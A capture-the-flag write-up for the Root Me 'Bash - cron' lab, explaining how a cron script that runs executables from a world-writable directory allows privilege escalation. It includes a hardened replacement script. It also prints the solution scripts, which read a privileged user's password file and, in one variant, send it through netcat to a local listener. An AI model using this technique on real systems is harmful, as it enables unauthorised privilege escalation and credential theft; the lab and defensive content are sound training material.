A good choice to start learning is
Root Me lets us practice on a large set of challenges, grouped into categories: App - Script, App - System, Cracking, Cryptanalysis, Forensic, Network, Programming, Realist, Steganography, Web - Client, Web - Server.
Let's start with the first category: App - Script.
The fifth challenge that we face is: Bash - cron:
Vulnerability type:
- Privilege Escalation by exploiting CRON jobs
##################################################
At the beginning, open terminal and type:
- ssh -p 2222 app-script-ch4@challenge02.root-me.org
to connect to the target system. If it asks for a password, enter app-script-ch4.
If we run ls -la, we see two entries: ch4 and cron.d, where cron.d is a symbolic link to the /tmp/._cron directory.
It's clear that this challenge is focused on cron jobs. Cron jobs schedule tasks by running commands at specific dates and times on the server. The list of cron jobs for the current user is shown by running crontab -l, and each entry is executed with the privileges of the user who owns that crontab.
First, let's analyze the ch4 script:
#!/bin/bash
# Sortie de la commande 'crontab -l' exécutée en tant que app-script-ch4-cracked:
# */1 * * * * /challenge/app-script/ch4/ch4
# Vous N'avez PAS à modifier la crontab(chattr +i t'façons)
# Output of the command 'crontab -l' run as app-script-ch4-cracked:
# */1 * * * * /challenge/app-script/ch4/ch4
# You do NOT need to edit the crontab (it's chattr +i anyway)
# hiding stdout/stderr
exec 1>/dev/null 2>&1
wdir="cron.d/"
challdir=${0%/*}
cd "$challdir"
if [ ! -e "/tmp/._cron" ]; then
    mkdir -m 733 "/tmp/._cron"
fi
ls -1a "${wdir}" | while read task; do
    if [ -f "${wdir}${task}" -a -x "${wdir}${task}" ]; then
        timelimit -q -s9 -S9 -t 5 bash -p "${PWD}/${wdir}${task}"
    fi
    rm -f "${PWD}/${wdir}${task}"
done
rm -rf cron.d/*
We cannot read the crontab with crontab -l, so we cannot directly see which programs are scheduled, but ch4 itself contains a hint:
# Output of the command 'crontab -l' run as app-script-ch4-cracked:
# */1 * * * * /challenge/app-script/ch4/ch4
# You do NOT need to edit the crontab (it's chattr +i anyway)
This tells us that ch4 is a cron job run every minute as app-script-ch4-cracked. How does ch4 work?
Looking at the code, ch4 first hides stdout and stderr, so we cannot expect any output on screen. Then, in the last part of the code, it lists every entry (which it calls a task) inside /tmp/._cron (reached through the cron.d symbolic link) and executes it. More precisely, ch4 executes an entry only if it is a regular file (the -f test) and is executable (the -x test); the -a between them is test's logical AND, not a separate existence check. Each task is killed after 5 seconds by timelimit.
It runs the task with bash -p "${PWD}/${wdir}${task}". The -p flag starts bash in privileged mode: bash does not reset its effective uid to the real uid and ignores $BASH_ENV and imported shell functions, so the task runs with the privileges cron gave ch4 (app-script-ch4-cracked) rather than ours. Without -p, a setuid bash would drop back to the invoking user's uid.
Finally, ch4 deletes each task after processing it and then removes everything left inside cron.d (that is, inside /tmp/._cron/).
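The root cause here is that ch4 runs whatever executable it finds in a directory (mode 733) that any local user can write to. As an added example, not part of the original write-up or the Root Me challenge, the script below is a hardened replacement for ch4's task loop: it refuses a task directory that is a symlink or writable by group/other, and refuses any task that is not a regular file, is not owned by the user running the loop, or is writable by group/other. It assumes Linux (GNU stat -c and coreutils timeout, used in place of the challenge's timelimit); the directory and task names in demo() are constructed for the demonstration.

```shell
#!/bin/bash
# Added example (not the challenge's own code): a hardened version of ch4's task
# loop. ch4 executes every executable regular file found in a mode-733 directory,
# so anyone who can write there gets code run with the cron owner's privileges.

# Exit 0 if the group or other write bit is set on the given path (GNU stat).
group_or_other_writable() {
    local mode
    mode=$(stat -c '%a' "$1" 2>/dev/null) || return 1
    case "$mode" in
        *[2367]?|*[2367]) return 0 ;;   # second-to-last digit: group, last: other
        *) return 1 ;;
    esac
}

# Print a verdict for the task directory itself: OK, or SKIP with the reason.
check_task_dir() {
    local dir="$1"
    if [ -L "$dir" ]; then echo "SKIP: $dir is a symlink"; return 1; fi
    if [ ! -d "$dir" ]; then echo "SKIP: $dir is not a directory"; return 1; fi
    if group_or_other_writable "$dir"; then echo "SKIP: $dir is writable by others"; return 1; fi
    echo "OK"
}

# Print a verdict for one task file: OK, or SKIP with the reason.
check_task() {
    local task="$1"
    if [ -L "$task" ] || [ ! -f "$task" ]; then echo "SKIP: not a regular file"; return 1; fi
    if [ "$(stat -c '%u' "$task")" != "$(id -u)" ]; then echo "SKIP: not owned by $(id -un)"; return 1; fi
    if group_or_other_writable "$task"; then echo "SKIP: writable by others"; return 1; fi
    if [ ! -x "$task" ]; then echo "SKIP: not executable"; return 1; fi
    echo "OK"
}

# Run the tasks in DIR that pass every check; print one line per task with its
# verdict. Hidden files are deliberately not picked up (ch4's ls -1a would).
run_tasks() {
    local dir="$1" verdict task
    verdict=$(check_task_dir "$dir") || { echo "$verdict"; return 1; }
    for task in "$dir"/*; do
        [ -e "$task" ] || continue
        verdict=$(check_task "$task")
        echo "$task: $verdict"
        [ "$verdict" = "OK" ] || continue
        timeout -s KILL 5 bash "$task"   # no -p: never keep a setuid effective uid
    done
}

# Constructed demonstration: a mode-733 directory like /tmp/._cron is refused;
# a mode-700 directory holding an owned, non-writable task is accepted and run.
demo() {
    local base
    base=$(mktemp -d)
    mkdir -m 733 "$base/open"
    mkdir -m 700 "$base/private"
    printf '#!/bin/sh\necho task ran\n' > "$base/private/job"
    chmod 700 "$base/private/job"
    run_tasks "$base/open"
    run_tasks "$base/private"
    rm -rf "$base"
}

demo
```

The ownership and write-bit checks are what close the hole: a task that another user can create or modify is never run, whatever its execute bits say. Dropping -p matters only if the runner itself were setuid, but it costs nothing and removes one more way for a caller's environment to influence the task.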
All of this tells us that we need to drop a script inside /tmp/._cron/. As noted, ch4 discards all output, so the command in our script must write its result to a file in a directory where we have full permissions, i.e. /tmp/. Our script could be:
#!/bin/bash
# runs as app-script-ch4-cracked: copy the flag somewhere our own user can read it
/bin/cat /challenge/app-script/ch4/.passwd > /tmp/solution; /bin/chmod 777 /tmp/solution
Then give the script execute permission (ch4 only runs files that pass the -x test):
- chmod 777 /tmp/._cron/script
The whole thing as a one-liner:
- echo '#!/bin/sh' > /tmp/._cron/script; echo '/bin/cat /challenge/app-script/ch4/.passwd > /tmp/solution ; /bin/chmod 777 /tmp/solution' >> /tmp/._cron/script ; chmod 777 /tmp/._cron/script
Once the cron job has run (at most one minute later), type cat /tmp/solution and the solution will be shown.
Useful links:
############################################
Another solution (from the Root Me website) uses netcat:
Start a screen session:
- screen -R ch4
and run the listener inside it:
- nc -lvp 8090
The port number must be above 1024, because binding lower ports requires root.
While inside screen, press
- Ctrl+a, then d
to detach from the session.
Create a file inside /tmp/._cron that contains the following:
#!/bin/sh
cat /challenge/app-script/ch4/.passwd | nc localhost 8090
and make the script executable, otherwise nothing is received:
- chmod 777 /tmp/._cron/script
Wait up to one minute for the cron job to run and read the password from netcat's output.
If screen was used, reattach with:
- screen -R ch4